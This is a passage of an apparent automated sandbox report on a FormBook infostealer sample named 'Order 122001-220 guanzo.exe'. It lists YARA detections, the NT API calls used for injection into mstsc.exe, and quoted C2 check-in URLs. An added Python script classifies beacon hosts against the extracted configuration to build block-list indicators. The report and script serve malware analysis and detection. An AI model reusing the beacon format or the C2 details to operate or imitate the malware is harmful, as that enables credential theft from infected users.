Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmp | String found in binary or memory: https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5
Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmp | String found in binary or memory: https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7S
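
The GET requests in this section all carry the URI path of the configured C2 entry (/meub/), the same fixed parameter (6lt4=M6ATVT20FLj), a varying second parameter (ktI) made of base64-style characters including '+' and '/', and no User-Agent, and every one of them goes to a host from the configuration's decoy list rather than to www.uuoouu-90.store: FormBook rotates through decoys so that the real server is one of many near-identical beacons. The script below is an added example, not part of the report, that classifies each observed Host against the extracted configuration, checks the path and the missing User-Agent, and separates the one actionable block-list entry from the decoys. CONFIG is the report's configuration with the decoy list cut to the domains needed here; the first six REQUESTS are request lines and Host headers copied from the report, the last two are constructed; the request-line grammar and header names are assumptions about the capture format.

```python
"""Triage of FormBook check-in traffic against the extracted configuration.

Added example, not part of the Joe Sandbox report. CONFIG is the report's
configuration with the decoy list cut down; the first six REQUESTS are copied
from the report's HTTP lines, the last two are constructed. The request-line
grammar and header names are assumptions about the capture format.
"""
import re

CONFIG = {
    "C2 list": ["www.uuoouu-90.store/meub/"],
    "decoy": ["comicstattoosnguns.com", "goeseo.com", "shadyshainarae.com",
              "thefrankversion.com", "pasteleriaruth.com", "amesshop.com",
              "paperplaneexplorer.com"],
}

REQUESTS = [
    ("GET /meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre HTTP/1.1",
     {"Host": "www.comicstattoosnguns.com", "Connection": "close"}),
    ("GET /meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj HTTP/1.1",
     {"Host": "www.goeseo.com", "Connection": "close"}),
    ("GET /meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib HTTP/1.1",
     {"Host": "www.shadyshainarae.com", "Connection": "close"}),
    ("GET /meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj HTTP/1.1",
     {"Host": "www.thefrankversion.com", "Connection": "close"}),
    ("GET /meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox HTTP/1.1",
     {"Host": "www.pasteleriaruth.com", "Connection": "close"}),
    ("GET /meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj HTTP/1.1",
     {"Host": "www.amesshop.com", "Connection": "close"}),
    # Constructed: the same check-in aimed at the configured C2 host.
    ("GET /meub/?6lt4=M6ATVT20FLj&ktI=CONSTRUCTEDVALUE HTTP/1.1",
     {"Host": "www.uuoouu-90.store", "Connection": "close"}),
    # Constructed: an ordinary browser request, to exercise the benign branch.
    ("GET / HTTP/1.1",
     {"Host": "www.example.com", "User-Agent": "Mozilla/5.0", "Connection": "close"}),
]

REQ_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>[^?\s]+)(?:\?(?P<query>\S*))? HTTP/1\.[01]$")


def parse_request_line(line):
    """Return (method, path, {param: raw value}). Values stay undecoded:
    '+' and '/' are part of FormBook's encoded payload, not URL escapes."""
    m = REQ_RE.match(line)
    if not m:
        raise ValueError(f"not an HTTP request line: {line!r}")
    query = {}
    for pair in filter(None, (m.group("query") or "").split("&")):
        key, _, value = pair.partition("=")
        query[key] = value
    return m.group("method"), m.group("path"), query


def strip_www(host):
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def c2_entries(config):
    """Config C2 entries are 'host/path/'; return them as (host, '/path/')."""
    out = []
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        out.append((host.lower(), "/" + path))
    return out


def classify_host(host, config):
    bare = strip_www(host)
    if bare in {strip_www(h) for h, _ in c2_entries(config)}:
        return "c2"
    if bare in {strip_www(d) for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def triage(requests, config):
    """One record per request: host class, whether the URI path is the
    configured C2 path, and whether a User-Agent header was sent."""
    c2_paths = {p for _, p in c2_entries(config)}
    records = []
    for line, headers in requests:
        _, path, query = parse_request_line(line)
        hdrs = {k.lower(): v for k, v in headers.items()}
        records.append({"host": hdrs.get("host", ""),
                        "class": classify_host(hdrs.get("host", ""), config),
                        "path_matches_c2": path in c2_paths,
                        "has_user_agent": "user-agent" in hdrs,
                        "params": query})
    return records


def constant_params(records):
    """Parameters whose value never changes: 6lt4=M6ATVT20FLj in this traffic."""
    seen = {}
    for r in records:
        for k, v in r["params"].items():
            seen.setdefault(k, set()).add(v)
    return {k: next(iter(v)) for k, v in seen.items() if len(v) == 1}


def network_iocs(records, config):
    """Only the configured C2 host belongs on a block list; the decoys are
    third-party domains the bot beacons to in order to hide the real server."""
    return {"block": sorted({h for h, _ in c2_entries(config)}),
            "c2_path": sorted({p for _, p in c2_entries(config)}),
            "decoys_contacted": sorted({r["host"] for r in records if r["class"] == "decoy"})}
```

Calling triage(REQUESTS, CONFIG) classes the six report requests as decoy, the constructed one as c2 and the browser request as unknown; network_iocs then yields block = ['www.uuoouu-90.store'] and c2_path = ['/meub/'] with the decoy hosts listed separately. Two points for anyone turning the report into indicators. The destinations in the Snort alerts above (34.102.136.180, 104.164.26.246, 18.219.49.238, 162.241.62.63) are not confirmed C2 infrastructure: the only host the configuration names is www.uuoouu-90.store, every GET the report lists went to a decoy, and blocking decoy domains or their addresses breaks legitimate sites without touching the operator. The durable detection is the request shape, the configured path plus two parameters (one constant across all requests, one a long base64-like value containing '+' and '/') sent without a User-Agent, which is the traffic the ET FormBook check-in rules fire on here regardless of destination.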

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: Order 122001-220 guanzo.exe
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_004181C0 NtCreateFile
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_00418270 NtReadFile
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_004182F0 NtClose
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_004181BC NtCreateFile
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0041826A NtReadFile
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_004182EC NtClose
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0041839B NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019299A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019295D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019298F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019297A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019296E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019299D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019295F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0192AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929950 NtQueueApcThread
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929560 NtWriteFile
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019298A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929820 NtEnumerateKey
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0192B040 NtSuspendThread
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0192A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0192A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929B00 NtSetValueKey
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929770 NtSetInformationFile
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0192A770 NtOpenThread
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929760 NtOpenProcess
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019296D0 NtCreateKey
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929A10 NtQuerySection
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929650 NtQueryValueKey
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01929670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B199A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B195D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B196E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B196D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B198A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B198F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B1B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B195F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B199D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B1AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19560 NtWriteFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19A20 NtResumeThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19A10 NtQuerySection
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B1A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B197A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B1A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B1A770 NtOpenThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B19760 NtOpenProcess
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_008581C0 NtCreateFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_008582F0 NtClose
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00858270 NtReadFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_008583A0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_008581BC NtCreateFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_008582EC NtClose
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0085826A NtReadFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0085839B NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 04ADB150 appears 35 times
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: String function: 018EB150 appears 35 times
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000000.00000000.663743680.0000000000128000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDispIdAttribute.exe0 vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000001.00000002.708232981.0000000000F08000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDispIdAttribute.exe0 vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000001.00000002.709376627.0000000003653000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemstsc.exej% vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000001.00000002.708808706.00000000019DF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe | Binary or memory string: OriginalFilenameDispIdAttribute.exe0 vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Order 122001-220 guanzo.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/7
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order 122001-220 guanzo.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:808:120:WilError_01
          Source: Order 122001-220 guanzo.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
